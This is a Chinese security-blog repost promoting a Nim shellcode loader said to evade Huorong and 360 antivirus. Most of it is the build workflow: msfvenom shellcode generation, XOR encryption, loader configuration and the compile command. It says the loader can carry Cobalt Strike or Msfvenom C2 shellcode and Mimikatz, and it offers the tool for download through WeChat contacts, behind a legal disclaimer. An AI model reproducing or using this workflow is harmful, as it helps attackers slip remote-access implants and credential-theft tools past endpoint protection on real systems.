nim免杀过某数字、某绒(12小时前更新)
2023-12-13 10:38:18 Author: Web安全工具库(查看原文) 阅读量:22 收藏

===================================

免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

0x01 工具介绍

免杀效果:h绒、36x(未开核晶)均联网,读入 Msfvenom 或 Cobalt Strike 等 C2 的 Shellcode 方式分离免杀,或者配合 donut 可以将 exe、dll 转为 Shellcode 载入 MimiKatz 等工具。

0x02 安装与使用

一、在 windows 配置 nim 环境。官网下载 https://nim-lang.org/install_windows.html

https://nim-lang.org/download/nim-2.0.0_x64.zip

二、msfvenom 生成 shellcode

msfvenom -a x64 -p windows/x64/exec CMD=calc -f raw -o calc_x64.bin

三、xor 加密 msfvenom 生成的 raw 格式 shellcode

> python .\xorencrypt.py .\calc_x64.bin> xor encrypted : .\calc_encrypted.bin

四、将加密后的文件名作为参数传递给 nim 文件中的 fopen 参数

//修改这里char key[] = "key";//修改这里fp = fopen("user.dat", "rb");

五、编译

nim c -d=mingw --app=gui --cpu=amd64 -d:release --opt:size --passL:-static .\x2Ldr.nim

六、效果

0x03 项目链接下载
1、通过阅读原文,到项目地址下载
2、关注公众号追梦前后台回复工具666,获取网盘下载链接
3、个人微信:ivu123ivu

· 今 日 推 荐 ·

京东购买链接:https://item.jd.com/13971514.html

本书可当作一本工具书使用,遇到类似问题时,可以挑选其中任何所需章节进行参考。第1部分主要介绍了企业网络安全管理体系的领域特色、行业特色以及方法论中的某些重点,对网络安全管理、团队建设、企业治理、行业协作等问题之间的联系进行了深入探讨,有助于读者从宏观视角理解网络安全问题的整体。第2部分主要介绍了一些具体实务的操作方法,包括设防、侦查、接敌、应战、取胜等实际工作中的内容;也包括一些开放式的探讨,例如安全运营、应急响应以及从业者自身发展等内容。这些内容对企业的网络安全负责人更好地掌控全局或对企业的网络安全技术人员更好地认知自身价值都具有积极意义。第3部分主要介绍了一些真实的实践案例,在此基础上探讨了企业网络安全管理体系运行过程中可能遇到的典型问题及其解决方案。


文章来源: http://mp.weixin.qq.com/s?__biz=MzI4MDQ5MjY1Mg==&mid=2247511909&idx=1&sn=b3000684d619c378cfec56a4cef73cfe&chksm=ea826dd87c5490b0862787cf2837560647ebd3f78b0789079dd48d5a8fe83f616bbea9ae223c&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh